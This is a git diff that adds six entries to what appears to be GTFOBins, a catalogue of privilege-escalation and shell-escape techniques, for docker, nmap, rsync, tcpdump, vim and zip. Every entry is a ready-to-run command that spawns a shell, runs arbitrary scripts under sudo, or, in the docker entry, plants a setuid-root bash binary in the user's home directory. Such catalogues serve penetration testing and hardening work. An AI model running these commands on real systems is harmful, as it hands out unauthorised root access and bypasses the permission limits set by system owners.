diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
new file mode 100644
index 0000000..1bc89b1
--- /dev/null
+++ b/_gtfobins/docker.md
@@ -0,0 +1,7 @@
+---
+functions:
+ execute-interactive:
+ - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+ sudo-enabled:
+ - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+---
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
new file mode 100644
index 0000000..d3632f5
--- /dev/null
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+ nmap --script=/tmp/script.nse
+ sudo-enabled:
+ - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+ sudo nmap --script=/tmp/script.nse
+---
diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
new file mode 100644
index 0000000..79ff9e4
--- /dev/null
+++ b/_gtfobins/rsync.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+ sudo-enabled:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+---
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
new file mode 100644
index 0000000..5c2165e
--- /dev/null
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,9 @@
+---
+functions:
+ execute-non-interactive:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+ sudo-enabled:
+ - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+---
diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md
new file mode 100644
index 0000000..fb45d0b
--- /dev/null
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+ execute-interactive:
+ - code: vim -c ':!/bin/sh'
+ - code: |
+ vim
+ :set shell=/bin/sh
+ :shell
+ file-write:
+ - code: |
+ vim file_to_write
+ w
+ file-read:
+ - code: vim file_to_read
+ suid-enabled:
+ - code: ./vim -c ':!/bin/sh -p'
+ sudo-enabled:
+ - code: sudo vim -c ':!/bin/sh'
+---
diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md
new file mode 100644
index 0000000..9d3864f
--- /dev/null
+++ b/_gtfobins/zip.md
@@ -0,0 +1,11 @@
+---
+functions:
+ execute-interactive:
+ - code: echo "/bin/sh" > /tmp/run.sh
+ chmod +x /tmp/run.sh
+ zip z.zip * -T -TT /tmp/run.sh
+ sudo-enabled:
+ - code: echo "/bin/sh" > /tmp/run.sh
+ chmod +x /tmp/run.sh
+ sudo zip z.zip * -T -TT /tmp/run.sh
+---